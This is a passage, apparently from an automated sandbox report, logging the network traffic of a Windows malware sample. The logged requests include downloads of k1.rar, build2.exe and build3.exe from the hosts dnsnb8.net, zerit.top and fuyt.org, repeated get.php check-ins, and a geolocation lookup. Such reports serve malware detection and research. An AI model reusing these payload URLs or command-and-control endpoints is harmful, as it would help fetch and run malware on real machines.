                  Jul 26, 2024 02:08:20.360343933 CEST7994970344.221.84.105192.168.2.7
                  Jul 26, 2024 02:08:21.346566916 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:21.346610069 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:21.346689939 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:21.377114058 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:21.377131939 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:21.863507032 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:21.863584042 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:21.878779888 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:21.878808022 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:21.879117012 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:21.879432917 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:21.881141901 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:21.928502083 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:22.237060070 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:22.237122059 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:22.237133980 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:22.237175941 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:22.237184048 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:22.237194061 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:22.237263918 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:22.237297058 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:22.238800049 CEST49704443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:22.238817930 CEST44349704188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:22.473608971 CEST4970580192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:22.476916075 CEST4970680192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:22.478570938 CEST804970592.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:22.478684902 CEST4970580192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:22.478854895 CEST4970580192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:22.481936932 CEST804970692.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:22.482068062 CEST4970680192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:22.482300997 CEST4970680192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:22.483867884 CEST804970592.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:22.487202883 CEST804970692.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:24.735459089 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:24.735500097 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:24.735579014 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:24.750134945 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:24.750150919 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.217088938 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.217164040 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:25.227622032 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:25.227632046 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.227953911 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.228065968 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:25.237620115 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:25.284499884 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.591082096 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.591146946 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:25.591165066 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.591187954 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.591269016 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:25.592170000 CEST49709443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:25.592181921 CEST44349709188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:25.645709991 CEST4971380192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:25.650650024 CEST804971392.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:25.650773048 CEST4971380192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:25.650954008 CEST4971380192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:25.656838894 CEST804971392.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:31.498740911 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:31.498779058 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:31.498851061 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:31.683650017 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:31.683670998 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.143244982 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.143480062 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.148952007 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.148967981 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.149205923 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.149281979 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.151252985 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.192502975 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.511415005 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.511495113 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.511508942 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.511555910 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.511562109 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.511610031 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.511617899 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.511652946 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:32.511667013 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.511702061 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.512826920 CEST49715443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:32.512842894 CEST44349715188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:39.374542952 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:39.374587059 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:39.374680996 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:39.521346092 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:39.521374941 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:39.938467026 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:39.938509941 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:39.938600063 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:39.947834015 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:39.947870016 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.019289017 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.019423008 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.024245977 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.024259090 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.024550915 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.024605989 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.026082993 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.068526983 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.407537937 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.407604933 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.407613993 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.407651901 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.407664061 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.407697916 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.408436060 CEST49725443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.408451080 CEST44349725188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.435931921 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.436003923 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.441317081 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.441329956 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.441607952 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.441659927 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.443591118 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.484523058 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.821957111 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.822041035 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.822063923 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:40.822153091 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.822947979 CEST49726443192.168.2.7188.114.97.3
                  Jul 26, 2024 02:08:40.822967052 CEST44349726188.114.97.3192.168.2.7
                  Jul 26, 2024 02:08:43.842466116 CEST804970692.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:43.842681885 CEST4970680192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:43.855720043 CEST4970680192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:43.860527039 CEST804970692.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:43.876261950 CEST4972980192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:43.881161928 CEST804972992.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:43.881285906 CEST4972980192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:43.883471012 CEST804970592.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:43.883543968 CEST4970580192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:43.885121107 CEST4972980192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:43.885195971 CEST4970580192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:43.890037060 CEST804972992.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:43.890136003 CEST804970592.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:47.048603058 CEST804971392.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:47.048696995 CEST4971380192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:47.048815966 CEST4971380192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:47.054486990 CEST804971392.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:48.871788025 CEST4973080192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:48.876774073 CEST804973092.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:48.876880884 CEST4973080192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:48.877033949 CEST4973080192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:48.881906986 CEST804973092.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:52.074775934 CEST4973180192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:52.080976963 CEST804973192.246.89.93192.168.2.7
                  Jul 26, 2024 02:08:52.081085920 CEST4973180192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:52.081275940 CEST4973180192.168.2.792.246.89.93
                  Jul 26, 2024 02:08:52.086081982 CEST804973192.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:05.270539999 CEST804972992.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:05.270644903 CEST4972980192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:05.270756960 CEST4972980192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:05.275681973 CEST804972992.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:10.249943018 CEST804973092.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:10.250093937 CEST4973080192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:10.250351906 CEST4973080192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:10.255175114 CEST804973092.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:13.452099085 CEST804973192.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:13.452168941 CEST4973180192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:13.452322960 CEST4973180192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:13.457457066 CEST804973192.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:15.295356989 CEST4973480192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:15.300297976 CEST804973492.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:15.300427914 CEST4973480192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:15.300649881 CEST4973480192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:15.305414915 CEST804973492.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:18.496695042 CEST4973580192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:18.501715899 CEST804973592.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:18.501879930 CEST4973580192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:18.502088070 CEST4973580192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:18.506850004 CEST804973592.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:36.695107937 CEST804973492.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:36.695274115 CEST4973480192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:36.695404053 CEST4973480192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:36.700206995 CEST804973492.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:39.873541117 CEST804973592.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:39.873831034 CEST4973580192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:39.873980045 CEST4973580192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:39.878849983 CEST804973592.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:41.778151035 CEST4973680192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:41.783189058 CEST804973692.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:41.783303022 CEST4973680192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:41.783459902 CEST4973680192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:41.788688898 CEST804973692.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:44.951800108 CEST4973780192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:44.957143068 CEST804973792.246.89.93192.168.2.7
                  Jul 26, 2024 02:09:44.957258940 CEST4973780192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:44.957355976 CEST4973780192.168.2.792.246.89.93
                  Jul 26, 2024 02:09:44.962661982 CEST804973792.246.89.93192.168.2.7
                  Jul 26, 2024 02:10:03.175143957 CEST804973692.246.89.93192.168.2.7
                  Jul 26, 2024 02:10:03.175249100 CEST4973680192.168.2.792.246.89.93
                  Jul 26, 2024 02:10:03.175391912 CEST4973680192.168.2.792.246.89.93
                  Jul 26, 2024 02:10:03.180269003 CEST804973692.246.89.93192.168.2.7
                  Jul 26, 2024 02:10:06.347278118 CEST804973792.246.89.93192.168.2.7
                  Jul 26, 2024 02:10:06.347356081 CEST4973780192.168.2.792.246.89.93
                  Jul 26, 2024 02:10:06.347446918 CEST4973780192.168.2.792.246.89.93
                  Jul 26, 2024 02:10:06.352628946 CEST804973792.246.89.93192.168.2.7

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 26, 2024 02:08:15.901932001 CEST6396453192.168.2.71.1.1.1
                  Jul 26, 2024 02:08:16.940419912 CEST6396453192.168.2.71.1.1.1
                  Jul 26, 2024 02:08:17.647167921 CEST6353653192.168.2.71.1.1.1
                  Jul 26, 2024 02:08:17.656430960 CEST53635361.1.1.1192.168.2.7
                  Jul 26, 2024 02:08:17.933192015 CEST6396453192.168.2.71.1.1.1
                  Jul 26, 2024 02:08:19.912739038 CEST53639641.1.1.1192.168.2.7
                  Jul 26, 2024 02:08:19.912790060 CEST53639641.1.1.1192.168.2.7
                  Jul 26, 2024 02:08:19.913047075 CEST53639641.1.1.1192.168.2.7
                  Jul 26, 2024 02:08:22.446768999 CEST5291553192.168.2.71.1.1.1
                  Jul 26, 2024 02:08:22.446922064 CEST5836253192.168.2.71.1.1.1
                  Jul 26, 2024 02:08:22.472579002 CEST53529151.1.1.1192.168.2.7
                  Jul 26, 2024 02:08:22.475737095 CEST53583621.1.1.1192.168.2.7

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 26, 2024 02:08:15.901932001 CEST192.168.2.71.1.1.10x28f8Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:16.940419912 CEST192.168.2.71.1.1.10x28f8Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:17.647167921 CEST192.168.2.71.1.1.10x5221Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:17.933192015 CEST192.168.2.71.1.1.10x28f8Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:22.446768999 CEST192.168.2.71.1.1.10x5ab1Standard query (0)fuyt.orgA (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:22.446922064 CEST192.168.2.71.1.1.10x577aStandard query (0)zerit.topA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 26, 2024 02:08:17.656430960 CEST1.1.1.1192.168.2.70x5221No error (0)api.2ip.ua188.114.97.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:17.656430960 CEST1.1.1.1192.168.2.70x5221No error (0)api.2ip.ua188.114.96.3A (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:19.912739038 CEST1.1.1.1192.168.2.70x28f8No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:19.912790060 CEST1.1.1.1192.168.2.70x28f8No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:19.913047075 CEST1.1.1.1192.168.2.70x28f8No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:22.472579002 CEST1.1.1.1192.168.2.70x5ab1No error (0)fuyt.org92.246.89.93A (IP address)IN (0x0001)false
                  Jul 26, 2024 02:08:22.475737095 CEST1.1.1.1192.168.2.70x577aNo error (0)zerit.top92.246.89.93A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • api.2ip.ua
                  • ddos.dnsnb8.net:799
                  • fuyt.org
                  • zerit.top

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.74970344.221.84.1057995968C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:08:19.939889908 CEST288OUTGET /cj//k1.rar HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: ddos.dnsnb8.net:799
                  Connection: Keep-Alive


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.74970592.246.89.93803804C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:08:22.478854895 CEST136OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.74970692.246.89.93803804C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:08:22.482300997 CEST89OUTGET /dl/build2.exe HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: zerit.top


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.74971392.246.89.93807336C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:08:25.650954008 CEST125OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.74972992.246.89.93803804C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:08:43.885121107 CEST93OUTGET /files/1/build3.exe HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.74973092.246.89.93803804C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:08:48.877033949 CEST136OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.74973192.246.89.93807336C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:08:52.081275940 CEST125OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.74973492.246.89.93803804C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:09:15.300649881 CEST136OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.74973592.246.89.93807336C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:09:18.502088070 CEST125OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.74973692.246.89.93803804C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:09:41.783459902 CEST136OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.74973792.246.89.93807336C:\Users\user\AppData\Local\f093f78b-5d1b-4ff3-a44b-0f8758a1af15\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  Jul 26, 2024 02:09:44.957355976 CEST125OUTGET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200 HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: fuyt.org


                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.749702188.114.97.34433712C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  2024-07-26 00:08:18 UTC85OUTGET /geo.json HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: api.2ip.ua
                  2024-07-26 00:08:18 UTC885INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 00:08:18 GMT
                  Content-Type: application/json
                  Transfer-Encoding: chunked
                  Connection: close
                  strict-transport-security: max-age=63072000; preload
                  x-frame-options: SAMEORIGIN
                  x-content-type-options: nosniff
                  x-xss-protection: 1; mode=block; report=...
                  access-control-allow-origin: *
                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                  access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=28rT3sY0r53z5xiknqum9eet7NCAfY2EysVQRYq1C6hdTYhpJIYRSmHjss2XPKFhZjqDZ%2Bkoz9zoLZTEs1i9nDgUS19Oyul9Hw0jgEdbdYkpy2y9dAwUnEFobEyO"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a90278aea3c437b-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-26 00:08:18 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
                  Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                  2024-07-26 00:08:18 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.749704188.114.97.34433804C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  TimestampBytes transferredDirectionData
                  2024-07-26 00:08:21 UTC85OUTGET /geo.json HTTP/1.1
                  User-Agent: Microsoft Internet Explorer
                  Host: api.2ip.ua
                  2024-07-26 00:08:22 UTC901INHTTP/1.1 200 OK
                  Date: Fri, 26 Jul 2024 00:08:22 GMT
                  Content-Type: application/json
                  Transfer-Encoding: chunked
                  Connection: close
                  strict-transport-security: max-age=63072000; preload
                  x-frame-options: SAMEORIGIN
                  x-content-type-options: nosniff
                  x-xss-protection: 1; mode=block; report=...
                  access-control-allow-origin: *
                  access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
